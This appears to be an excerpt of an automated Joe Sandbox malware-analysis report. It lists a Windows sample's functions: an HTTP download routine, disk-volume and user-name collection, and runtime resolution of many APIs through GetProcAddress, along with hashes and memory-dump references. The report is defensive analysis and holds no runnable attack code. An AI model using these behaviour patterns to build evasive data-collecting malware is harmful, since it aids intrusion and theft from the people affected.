                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: b95ebcbfb6a1d3d8ffdd3889c6232ea384af699446ebf7d1a3fc8eb74dfb38f3
                              • Instruction ID: 48026909ca6dd5b4a094c3ab3831c59f9a8599a3040a6862c330c0ca34bb7ac6
                              • Opcode Fuzzy Hash: b95ebcbfb6a1d3d8ffdd3889c6232ea384af699446ebf7d1a3fc8eb74dfb38f3
                              • Instruction Fuzzy Hash: 544144A07C27846EC624B7F5A87DFFD76625F5271FF607846AE8032382CB7C9508452A
                              Function 004C62D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1033 4c62d0-4c635b call 4daab0 call 4c4800 call 4daa50 InternetOpenA StrCmpCA 1040 4c635d 1033->1040 1041 4c6364-4c6368 1033->1041 1040->1041 1042 4c636e-4c6392 InternetConnectA 1041->1042 1043 4c6559-4c6575 call 4daab0 call 4dab10 * 2 1041->1043 1045 4c654f-4c6553 InternetCloseHandle 1042->1045 1046 4c6398-4c639c 1042->1046 1062 4c6578-4c657d 1043->1062 1045->1043 1048 4c639e-4c63a8 1046->1048 1049 4c63aa 1046->1049 1051 4c63b4-4c63e2 HttpOpenRequestA 1048->1051 1049->1051 1052 4c63e8-4c63ec 1051->1052 1053 4c6545-4c6549 InternetCloseHandle 1051->1053 1055 4c63ee-4c640f InternetSetOptionA 1052->1055 1056 4c6415-4c6455 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1045 1055->1056 1058 4c647c-4c649b call 4d8ad0 1056->1058 1059 4c6457-4c6477 call 4daa50 call 4dab10 * 2 1056->1059 1067 4c649d-4c64a4 1058->1067 1068 4c6519-4c6539 call 4daa50 call 4dab10 * 2 1058->1068 1059->1062 1071 4c64a6-4c64d0 InternetReadFile 1067->1071 1072 4c6517-4c653f InternetCloseHandle 1067->1072 1068->1062 1076 4c64db 1071->1076 1077 4c64d2-4c64d9 1071->1077 1072->1053 1076->1072 1077->1076 1078 4c64dd-4c6515 call 4dacc0 call 4dabb0 call 4dab10 1077->1078 1078->1071
                              APIs
                                • Part of subcall function 004DAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004DAAF6
                                • Part of subcall function 004C4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004C4889
                                • Part of subcall function 004C4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 004C4899
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                              • InternetOpenA.WININET(004E0DFF,00000001,00000000,00000000,00000000), ref: 004C6331
                              • StrCmpCA.SHLWAPI(?,012AE8D8), ref: 004C6353
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004C6385
                              • HttpOpenRequestA.WININET(00000000,GET,?,012AE0E0,00000000,00000000,00400100,00000000), ref: 004C63D5
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004C640F
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004C6421
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004C644D
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004C64BD
                              • InternetCloseHandle.WININET(00000000), ref: 004C653F
                              • InternetCloseHandle.WININET(00000000), ref: 004C6549
                              • InternetCloseHandle.WININET(00000000), ref: 004C6553
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: 984f4ab6b8e90e763e751edebf295cbca8b26a09e9449318413f9c868b88af75
                              • Instruction ID: 39199f1a603cc27a3045fa8286a39654da4432808c6bd60719bc5b5550263324
                              • Opcode Fuzzy Hash: 984f4ab6b8e90e763e751edebf295cbca8b26a09e9449318413f9c868b88af75
                              • Instruction Fuzzy Hash: 7071A175A10218ABDB14DF90DC59FEE7374BB44300F10819FF2066B294DBB86A85CF59
                              Function 004D7690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1356 4d7690-4d76da GetWindowsDirectoryA 1357 4d76dc 1356->1357 1358 4d76e3-4d7757 GetVolumeInformationA call 4d8e90 * 3 1356->1358 1357->1358 1365 4d7768-4d776f 1358->1365 1366 4d778c-4d77a7 GetProcessHeap RtlAllocateHeap 1365->1366 1367 4d7771-4d778a call 4d8e90 1365->1367 1369 4d77a9-4d77b6 call 4daa50 1366->1369 1370 4d77b8-4d77e8 wsprintfA call 4daa50 1366->1370 1367->1365 1377 4d780e-4d781e 1369->1377 1370->1377
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004D76D2
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004D770F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004D7793
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004D779A
                              • wsprintfA.USER32 ref: 004D77D0
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\
                              • API String ID: 1544550907-3809124531
                              • Opcode ID: b3691c8a34649f5864ff138a008f1f6f4e7a467097230ee062841492020bbb66
                              • Instruction ID: 52151d23f7672283911a6aa4d1e6a78bf54dd404b633de7e0c3b09cf2f6f82e0
                              • Opcode Fuzzy Hash: b3691c8a34649f5864ff138a008f1f6f4e7a467097230ee062841492020bbb66
                              • Instruction Fuzzy Hash: 9C4164B1D043589BDB10DB94DC95BEEB7B8AF48704F10419FF509AB380E7786A44CBA9
                              Function 004D79E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004C11B7), ref: 004D7A10
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004D7A17
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 004D7A2F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: 457e7f53c907f3f71043a7a09c481ff6bcc02ccf3f327638edb7963d5ccbc56c
                              • Instruction ID: a1ed1049715f35441d40e3ee2c01333acc1c363fec7b33ef9b5fe7db824165b1
                              • Opcode Fuzzy Hash: 457e7f53c907f3f71043a7a09c481ff6bcc02ccf3f327638edb7963d5ccbc56c
                              • Instruction Fuzzy Hash: 3FF0AFB1958209EBC704CF88DC45BAEBBB8FB04711F10421BF605A2380C3781500CBA1
                              Function 004C1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: 634474ca97dbfc87d0fd3895834ceff9881e53a9f9730258b91f4dffe86d056a
                              • Instruction ID: 9bef633cc6a627c81df89ccd8423a1f8559a3b63616c9d6ac26427abc69f96a0
                              • Opcode Fuzzy Hash: 634474ca97dbfc87d0fd3895834ceff9881e53a9f9730258b91f4dffe86d056a
                              • Instruction Fuzzy Hash: 8ED05E7494430C9BCB04DFE0994AADDBB78FB4D215F00055AD90562250EA345442CA69
                              Function 004D9F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 633 4d9f20-4d9f2a 634 4da346-4da3da LoadLibraryA * 8 633->634 635 4d9f30-4da341 GetProcAddress * 43 633->635 636 4da3dc-4da451 GetProcAddress * 5 634->636 637 4da456-4da45d 634->637 635->634 636->637 638 4da526-4da52d 637->638 639 4da463-4da521 GetProcAddress * 8 637->639 640 4da52f-4da5a3 GetProcAddress * 5 638->640 641 4da5a8-4da5af 638->641 639->638 640->641 642 4da5b5-4da642 GetProcAddress * 6 641->642 643 4da647-4da64e 641->643 642->643 644 4da72f-4da736 643->644 645 4da654-4da72a GetProcAddress * 9 643->645 646 4da738-4da7ad GetProcAddress * 5 644->646 647 4da7b2-4da7b9 644->647 645->644 646->647 648 4da7ec-4da7f3 647->648 649 4da7bb-4da7e7 GetProcAddress * 2 647->649 650 4da825-4da82c 648->650 651 4da7f5-4da820 GetProcAddress * 2 648->651 649->648 652 4da922-4da929 650->652 653 4da832-4da91d GetProcAddress * 10 650->653 651->650 654 4da98d-4da994 652->654 655 4da92b-4da988 GetProcAddress * 4 652->655 653->652 656 4da9ae-4da9b5 654->656 657 4da996-4da9a9 GetProcAddress 654->657 655->654 658 4daa18-4daa19 656->658 659 4da9b7-4daa13 GetProcAddress * 4 656->659 657->656 659->658
                              APIs
                              • GetProcAddress.KERNEL32(74DD0000,01295D90), ref: 004D9F3D
                              • GetProcAddress.KERNEL32(74DD0000,01295C50), ref: 004D9F55
                              • GetProcAddress.KERNEL32(74DD0000,012A96D0), ref: 004D9F6E
                              • GetProcAddress.KERNEL32(74DD0000,012A9640), ref: 004D9F86
                              • GetProcAddress.KERNEL32(74DD0000,012A9610), ref: 004D9F9E
                              • GetProcAddress.KERNEL32(74DD0000,012A9628), ref: 004D9FB7
                              • GetProcAddress.KERNEL32(74DD0000,0129BD88), ref: 004D9FCF
                              • GetProcAddress.KERNEL32(74DD0000,012AD218), ref: 004D9FE7
                              • GetProcAddress.KERNEL32(74DD0000,012AD140), ref: 004DA000
                              • GetProcAddress.KERNEL32(74DD0000,012AD188), ref: 004DA018
                              • GetProcAddress.KERNEL32(74DD0000,012AD1E8), ref: 004DA030
                              • GetProcAddress.KERNEL32(74DD0000,01295D50), ref: 004DA049
                              • GetProcAddress.KERNEL32(74DD0000,01295CD0), ref: 004DA061
                              • GetProcAddress.KERNEL32(74DD0000,01295C70), ref: 004DA079
                              • GetProcAddress.KERNEL32(74DD0000,01295D30), ref: 004DA092
                              • GetProcAddress.KERNEL32(74DD0000,012AD368), ref: 004DA0AA
                              • GetProcAddress.KERNEL32(74DD0000,012AD1A0), ref: 004DA0C2
                              • GetProcAddress.KERNEL32(74DD0000,0129BBA8), ref: 004DA0DB
                              • GetProcAddress.KERNEL32(74DD0000,01295C90), ref: 004DA0F3
                              • GetProcAddress.KERNEL32(74DD0000,012AD2A8), ref: 004DA10B
                              • GetProcAddress.KERNEL32(74DD0000,012AD260), ref: 004DA124
                              • GetProcAddress.KERNEL32(74DD0000,012AD1B8), ref: 004DA13C
                              • GetProcAddress.KERNEL32(74DD0000,012AD158), ref: 004DA154
                              • GetProcAddress.KERNEL32(74DD0000,01295CB0), ref: 004DA16D
                              • GetProcAddress.KERNEL32(74DD0000,012AD350), ref: 004DA185
                              • GetProcAddress.KERNEL32(74DD0000,012AD1D0), ref: 004DA19D
                              • GetProcAddress.KERNEL32(74DD0000,012AD200), ref: 004DA1B6
                              • GetProcAddress.KERNEL32(74DD0000,012AD230), ref: 004DA1CE
                              • GetProcAddress.KERNEL32(74DD0000,012AD248), ref: 004DA1E6
                              • GetProcAddress.KERNEL32(74DD0000,012AD2C0), ref: 004DA1FF
                              • GetProcAddress.KERNEL32(74DD0000,012AD170), ref: 004DA217
                              • GetProcAddress.KERNEL32(74DD0000,012AD278), ref: 004DA22F
                              • GetProcAddress.KERNEL32(74DD0000,012AD290), ref: 004DA248
                              • GetProcAddress.KERNEL32(74DD0000,012AA6C0), ref: 004DA260
                              • GetProcAddress.KERNEL32(74DD0000,012AD2D8), ref: 004DA278
                              • GetProcAddress.KERNEL32(74DD0000,012AD3C8), ref: 004DA291
                              • GetProcAddress.KERNEL32(74DD0000,01295DD0), ref: 004DA2A9
                              • GetProcAddress.KERNEL32(74DD0000,012AD2F0), ref: 004DA2C1
                              • GetProcAddress.KERNEL32(74DD0000,012959B0), ref: 004DA2DA
                              • GetProcAddress.KERNEL32(74DD0000,012AD308), ref: 004DA2F2
                              • GetProcAddress.KERNEL32(74DD0000,012AD320), ref: 004DA30A
                              • GetProcAddress.KERNEL32(74DD0000,01295870), ref: 004DA323
                              • GetProcAddress.KERNEL32(74DD0000,012959D0), ref: 004DA33B
                              • LoadLibraryA.KERNEL32(012AD338,?,004D5EF3,004E0AEB,?,?,?,?,?,?,?,?,?,?,004E0AEA,004E0AE7), ref: 004DA34D
                              • LoadLibraryA.KERNEL32(012AD0F8,?,004D5EF3,004E0AEB,?,?,?,?,?,?,?,?,?,?,004E0AEA,004E0AE7), ref: 004DA35E
                              • LoadLibraryA.KERNEL32(012AD380,?,004D5EF3,004E0AEB,?,?,?,?,?,?,?,?,?,?,004E0AEA,004E0AE7), ref: 004DA370
                              • LoadLibraryA.KERNEL32(012AD398,?,004D5EF3,004E0AEB,?,?,?,?,?,?,?,?,?,?,004E0AEA,004E0AE7), ref: 004DA382
                              • LoadLibraryA.KERNEL32(012AD3B0,?,004D5EF3,004E0AEB,?,?,?,?,?,?,?,?,?,?,004E0AEA,004E0AE7), ref: 004DA393
                              • LoadLibraryA.KERNEL32(012AD110,?,004D5EF3,004E0AEB,?,?,?,?,?,?,?,?,?,?,004E0AEA,004E0AE7), ref: 004DA3A5
                              • LoadLibraryA.KERNEL32(012AD3E0,?,004D5EF3,004E0AEB,?,?,?,?,?,?,?,?,?,?,004E0AEA,004E0AE7), ref: 004DA3B7
                              • LoadLibraryA.KERNEL32(012AD128,?,004D5EF3,004E0AEB,?,?,?,?,?,?,?,?,?,?,004E0AEA,004E0AE7), ref: 004DA3C8
                              • GetProcAddress.KERNEL32(75290000,01295710), ref: 004DA3EA
                              • GetProcAddress.KERNEL32(75290000,012AD4E8), ref: 004DA402
                              • GetProcAddress.KERNEL32(75290000,012A9228), ref: 004DA41A
                              • GetProcAddress.KERNEL32(75290000,012AD518), ref: 004DA433
                              • GetProcAddress.KERNEL32(75290000,01295890), ref: 004DA44B
                              • GetProcAddress.KERNEL32(73440000,0129BA68), ref: 004DA470
                              • GetProcAddress.KERNEL32(73440000,012958F0), ref: 004DA489
                              • GetProcAddress.KERNEL32(73440000,0129B900), ref: 004DA4A1
                              • GetProcAddress.KERNEL32(73440000,012AD578), ref: 004DA4B9
                              • GetProcAddress.KERNEL32(73440000,012AD428), ref: 004DA4D2
                              • GetProcAddress.KERNEL32(73440000,012958D0), ref: 004DA4EA
                              • GetProcAddress.KERNEL32(73440000,01295970), ref: 004DA502
                              • GetProcAddress.KERNEL32(73440000,012AD590), ref: 004DA51B
                              • GetProcAddress.KERNEL32(752C0000,01295770), ref: 004DA53C
                              • GetProcAddress.KERNEL32(752C0000,012957F0), ref: 004DA554
                              • GetProcAddress.KERNEL32(752C0000,012AD488), ref: 004DA56D
                              • GetProcAddress.KERNEL32(752C0000,012AD4B8), ref: 004DA585
                              • GetProcAddress.KERNEL32(752C0000,012958B0), ref: 004DA59D
                              • GetProcAddress.KERNEL32(74EC0000,0129BA90), ref: 004DA5C3
                              • GetProcAddress.KERNEL32(74EC0000,0129B7C0), ref: 004DA5DB
                              • GetProcAddress.KERNEL32(74EC0000,012AD560), ref: 004DA5F3
                              • GetProcAddress.KERNEL32(74EC0000,01295750), ref: 004DA60C
                              • GetProcAddress.KERNEL32(74EC0000,012957B0), ref: 004DA624
                              • GetProcAddress.KERNEL32(74EC0000,0129B950), ref: 004DA63C
                              • GetProcAddress.KERNEL32(75BD0000,012AD4A0), ref: 004DA662
                              • GetProcAddress.KERNEL32(75BD0000,012957D0), ref: 004DA67A
                              • GetProcAddress.KERNEL32(75BD0000,012A91C8), ref: 004DA692
                              • GetProcAddress.KERNEL32(75BD0000,012AD4D0), ref: 004DA6AB
                              • GetProcAddress.KERNEL32(75BD0000,012AD530), ref: 004DA6C3
                              • GetProcAddress.KERNEL32(75BD0000,01295810), ref: 004DA6DB
                              • GetProcAddress.KERNEL32(75BD0000,01295A10), ref: 004DA6F4
                              • GetProcAddress.KERNEL32(75BD0000,012AD500), ref: 004DA70C
                              • GetProcAddress.KERNEL32(75BD0000,012AD470), ref: 004DA724
                              • GetProcAddress.KERNEL32(75A70000,01295790), ref: 004DA746
                              • GetProcAddress.KERNEL32(75A70000,012AD548), ref: 004DA75E
                              • GetProcAddress.KERNEL32(75A70000,012AD410), ref: 004DA776
                              • GetProcAddress.KERNEL32(75A70000,012AD5A8), ref: 004DA78F
                              • GetProcAddress.KERNEL32(75A70000,012AD440), ref: 004DA7A7
                              • GetProcAddress.KERNEL32(75450000,012959F0), ref: 004DA7C8
                              • GetProcAddress.KERNEL32(75450000,012956D0), ref: 004DA7E1
                              • GetProcAddress.KERNEL32(75DA0000,01295830), ref: 004DA802
                              • GetProcAddress.KERNEL32(75DA0000,012AD3F8), ref: 004DA81A
                              • GetProcAddress.KERNEL32(6F070000,01295850), ref: 004DA840
                              • GetProcAddress.KERNEL32(6F070000,01295910), ref: 004DA858
                              • GetProcAddress.KERNEL32(6F070000,01295730), ref: 004DA870
                              • GetProcAddress.KERNEL32(6F070000,012AD458), ref: 004DA889
                              • GetProcAddress.KERNEL32(6F070000,01295930), ref: 004DA8A1
                              • GetProcAddress.KERNEL32(6F070000,01295A30), ref: 004DA8B9
                              • GetProcAddress.KERNEL32(6F070000,01295950), ref: 004DA8D2
                              • GetProcAddress.KERNEL32(6F070000,01295990), ref: 004DA8EA
                              • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 004DA901
                              • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 004DA917
                              • GetProcAddress.KERNEL32(75AF0000,012ACF18), ref: 004DA939
                              • GetProcAddress.KERNEL32(75AF0000,012A9238), ref: 004DA951
                              • GetProcAddress.KERNEL32(75AF0000,012ACFC0), ref: 004DA969
                              • GetProcAddress.KERNEL32(75AF0000,012ACEA0), ref: 004DA982
